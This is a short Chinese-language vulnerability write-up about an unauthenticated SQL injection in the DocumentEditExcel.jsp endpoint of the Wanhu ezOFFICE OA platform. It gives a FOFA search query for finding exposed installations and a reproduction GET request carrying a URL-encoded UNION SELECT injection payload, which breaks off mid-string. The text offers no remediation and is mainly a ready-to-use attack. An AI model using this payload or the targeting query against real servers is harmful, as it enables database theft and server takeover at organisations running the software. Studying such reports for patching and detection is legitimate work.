产品简介
万户OA是万户网络技术有限公司OA设计的一款软件。他涵盖了共同办公、信息充分关系、各种业务系统的综合共同办公平台。
漏洞描述
万户 ezOFFICE DocumentEditExcel.jsp接口存在sql注入漏洞,未授权的攻击者可利用此漏洞获取数据库权限,深入利用可获取服务器权限。
fofa
app=”万户ezOFFICE协同管理平台”
漏洞复现
GET /defaultroot/public/iWebOfficeSign/DocumentEditExcel.jsp;?RecordID=%31%27%20%55%4e%49%4f%4e%20%41%4c%4c%20%53%45%4c%45%43%54%20%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%43%48%41%52%28%31%31%33%29%2b%43%48%41%52%28%31%30%36%29%2b%43%48%41%52%28%31%30%36%29%2b%43%48%41%52%28%31%31%32%29%2b%43%48%41%52%28%31%31%33%29%2b%